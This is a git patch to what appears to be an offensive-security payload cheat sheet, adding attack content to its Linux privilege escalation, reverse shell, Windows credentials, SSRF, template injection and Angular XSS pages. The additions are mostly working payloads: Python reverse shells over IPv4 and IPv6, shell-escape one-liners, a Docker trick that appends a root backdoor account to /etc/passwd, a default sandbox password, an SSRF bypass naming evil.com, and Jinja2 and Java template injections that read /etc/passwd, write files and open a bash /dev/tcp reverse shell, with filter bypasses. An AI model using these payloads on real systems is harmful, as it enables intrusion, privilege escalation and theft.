From 2e3aef1a19f0361f609c1e655d1f47f0fa6356b8 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 7 Jan 2019 18:15:45 +0100 Subject: [PATCH] Shell IPv6 + Sandbox credential --- .gitignore | 1 + .../Active Directory Attack.md | 1 + .../Linux - Privilege Escalation.md | 23 ++++ .../Reverse Shell Cheatsheet.md | 6 + .../Windows - Privilege Escalation.md | 1 + .../Windows - Using credentials.md | 11 ++ SSRF injection/README.md | 6 + Server Side Template injections/README.md | 121 +++++++++++++----- XSS injection/XSS in Angular.md | 2 + 9 files changed, 140 insertions(+), 32 deletions(-) diff --git a/.gitignore b/.gitignore index aa95f38..18dcf8e 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ BuildPDF/ .vscode .todo +AWS Amazon Lambda/ \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f0a3c40..289fd20 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ./bloodhound SharpHound.exe (from resources/Ingestor) + SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 or Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public ``` diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index f56c0e3..7a0fad4 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -8,6 +8,7 @@ ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) +- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## Checklists @@ -82,6 +83,28 @@ * Checks to see if the host has Docker installed * Checks to determine if we're in an LXC container +## GTFOBins + +[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. + +The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. + +> gdb -nx -ex '!sh' -ex quit +> sudo mysql -e '\! /bin/sh' +> strace -o /dev/null /bin/sh + +## Groups + +### Docker + +Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`. + +```bash +$> docker run -it --rm -v $PWD:/mnt bash +$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd +``` + + ## References - []() \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index aca8882..ec33326 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -36,10 +36,16 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen( Linux only +IPv4 ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` +IPv6 +```python +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` + ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3a090a8..6ae7f2f 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -6,6 +6,7 @@ - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) +- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) ## Windows Version and Configuration diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 5f848a4..e548695 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -23,6 +23,17 @@ Username: RetailAdmin Password: trs10 ``` +## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) + +Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard + +```powershell +\\windowssandbox +Username: wdagutilityaccount +Password: pw123 +``` + + ## Metasploit - SMB ```c diff --git a/SSRF injection/README.md b/SSRF injection/README.md index dbb18ca..202749a 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -159,6 +159,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +Bypass filter_var() php function + +```powershell +0://evil.com:80;http://google.com:80/ +``` + Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)) ```powershell diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 2a91737..7cd6d5b 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -1,6 +1,42 @@ # Templates Injections -> Template injection allows an attacker to include template code into an existant (or not) template. +> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages + +## Summary + +* [Tools](#tools) +* [Methodology](#methodology) +* [Ruby](#ruby) + * [Basic injection](#basic-injection) + * [Retrieve /etc/passwd](#retrieve--etc-passwd) + * [List files and directories](#list-files-and-directories) +* [Java](#java) + * [Basic injection](#basic-injection) + * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables) + * [Retrieve /etc/passwd](#retrieve--etc-passwd) +* [Twig](#twig) + * [Basic injection](#basic-injection) + * [Template format](#template-format) + * [Code execution](#code-execution) +* [Smarty](#smarty) +* [Freemarker](#freemarker) +* [Jade / Codepen](#jade---codepen) +* [Velocity](#velocity) +* [Mako](#mako) +* [Jinja2](#jinja2) + * [Basic injection](#basic-injection) + * [Template format](#template-format) + * [Dump all used classes](#dump-all-used-classes) + * [Dump all config variables](#dump-all-config-variables) + * [Read remote file](#read-remote-file) + * [Write into remote file](#write-into-remote-file) + * [Remote Code Execution](#remote-code-execution) + * [Filter bypass](filter-bypass) +* [Jinjava](#jinjava) + * [Basic injection](#basic-injection) + * [Command execution](#command-execution) + +## Tools Recommended tool: [Tplmap](https://github.com/epinna/tplmap) e.g: @@ -37,7 +73,7 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ## Java -### Java - Basic injection +### Basic injection ```java ${7*7} @@ -47,13 +83,13 @@ ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} ``` -### Java - Retrieve the system’s environment variables +### Retrieve the system’s environment variables ```java ${T(java.lang.System).getenv()} ``` -### Java - Retrieve /etc/passwd +### Retrieve /etc/passwd ```java ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} @@ -63,14 +99,14 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ## Twig -### Twig - Basic injection +### Basic injection ```python {{7*7}} {{7*'7'}} would result in 49 ``` -### Twig - Template format +### Template format ```python $output = $twig > render ( @@ -84,7 +120,7 @@ $output = $twig > render ( ); ``` -### Twig - Code execution +### Code execution ```python {{self}} @@ -145,7 +181,7 @@ ${x} [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Jinja2 - Basic injection +### Basic injection ```python {{4*4}}[[5*5]] @@ -155,7 +191,7 @@ ${x} Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application. -### Jinja2 - Template format +### Template format ```python {% extends "layout.html" %} @@ -169,7 +205,7 @@ The above injections have been tested on Flask application. ``` -### Jinja2 - Dump all used classes +### Dump all used classes ```python {{ [].class.base.subclasses() }} @@ -177,7 +213,7 @@ The above injections have been tested on Flask application. {{ ''.__class__.__mro__[2].__subclasses__() }} ``` -### Jinja2 - Dump all config variables +### Dump all config variables ```python {% for key, value in config.iteritems() %} @@ -186,20 +222,20 @@ The above injections have been tested on Flask application. {% endfor %} ``` -### Jinja2 - Read remote file +### Read remote file ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ``` -### Jinja2 - Write into remote file +### Write into remote file ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} ``` -### Jinja2 - Remote Code Execution via reverse shell +### Remote Code Execution Listen for connexion @@ -215,10 +251,42 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` +### Filter bypass + +```python +request.__class__ +request["__class__"] +``` + +Bypassing `_` + +```python +http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_ + +{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} +{{request|attr(["_"*2,"class","_"*2]|join)}} +{{request|attr(["__","class","__"]|join)}} +{{request|attr("__class__")}} +{{request.__class__}} +``` + +Bypassing `[` and `]` + +```python +http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_ +or +http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_ +``` + +Bypassing `|join` + +```python +http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ +``` + ## Jinjava - -### Jinjava - Basic injection +### Basic injection ```python {{'a'.toUpperCase()}} would result in 'A' @@ -227,7 +295,7 @@ Inject this template Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) -### Jinjava - Command execution +### Command execution Fixed by https://github.com/HubSpot/jinjava/pull/230 @@ -242,20 +310,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` -## Client Side Template Injection - -### AngularJS - -```javascript -$eval('1+1') -{{1+1}} -``` - -### Vue JS - -```javascript -{{constructor.constructor('alert(1)')()}} -``` ## References @@ -267,4 +321,7 @@ $eval('1+1') * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/) * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) * [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) -* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) \ No newline at end of file +* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) +* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) +* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) +* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) \ No newline at end of file diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index 14a924c..fe77894 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -1,5 +1,7 @@ # XSS in Angular +The following payloads are based on Client Side Template Injection. + ## Stored/Reflected XSS - Simple alert > Angular as of version 1.6 have removed the sandbox altogether